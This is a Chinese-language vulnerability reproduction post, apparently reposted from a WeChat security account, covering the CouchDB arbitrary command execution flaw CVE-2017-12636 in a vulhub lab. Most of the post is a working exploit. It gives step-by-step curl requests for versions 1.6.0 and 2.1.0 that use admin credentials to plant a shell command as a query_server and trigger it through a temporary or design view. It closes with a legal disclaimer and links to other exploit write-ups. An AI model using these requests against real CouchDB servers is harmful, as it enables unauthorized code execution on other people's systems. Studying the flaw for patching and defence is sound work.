Couchdb任意命令执行漏洞 (CVE-2017-12636)

2024年4月24日07:03:33评论12 views字数 2341阅读7分48秒阅读模式

漏洞简介

ApacheCouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。

影响版本

小于 1.7.0 以及小于 2.1.1

漏洞复现

依然选择用现成的靶场，开启服务，服务开启后访问http://your-ip:5984

目前木有管理员的账号和密码，首先我们通过CVE-2017-12635漏洞增添一个users，账号和密码均为vulhub

Couchdb任意命令执行漏洞 (CVE-2017-12636)

1.6.0下的说明

依次执行以下请求以触发任意命令execHere, vulhub:vulhub是管理员帐户和密码。

curl -X PUT '[http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd](http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd)' -d '"id >/tmp/success"'

Couchdb任意命令执行漏洞 (CVE-2017-12636)

#添加一个query_servers，其名称为cmd，值为“id >/tmp/success”，这是我们稍后要执行的命令。

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'

Couchdb任意命令执行漏洞 (CVE-2017-12636)

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'

Couchdb任意命令执行漏洞 (CVE-2017-12636)

#添加数据库和文档，只有在添加到这里之后才能查询

curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language": "cmd", "map":""}' -H 'Content-Type: application/json'

Couchdb任意命令执行漏洞 (CVE-2017-12636)

在这个数据库中执行查询，使用我在第一步中添加的名为cmd的query_servers，最后触发命令执行。

2.1.0下的说明：

2.1.0中修改了我上面用到的两个API，这里需要详细说明一下。

Couchdb 2.x 引入了集群，所以修改配置的API需要增加node name。这个其实也简单，我们带上账号密码访问/_membership即可：

curl http://vulhub:vulhub@your-ip:5984/_membership

Couchdb任意命令执行漏洞 (CVE-2017-12636)

可见，我们这里只有一个node，名字是nonde@nohost。然后，我们修改nonde@nohost的配置：

curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'

Couchdb任意命令执行漏洞 (CVE-2017-12636)

然后，与1.6.0的利用方式相同，我们先增加一个Database和一个Document：

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'

Couchdb 2.x删除了_temp_view，所以我们为了触发query_servers中定义的命令，需要添加一个_view:

curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test", "views":{"woyun":{"map":""} }," language": "cmd"}' -H "Content-Type: application/json"

然后将执行query_servers中的命令。

Couchdb任意命令执行漏洞 (CVE-2017-12636)

文章版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：Couchdb任意命令执行漏洞 (CVE-2017-12636)

左青龙
微信扫一扫

右白虎
微信扫一扫

Couchdb任意命令执行漏洞 (CVE-2017-12636)

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论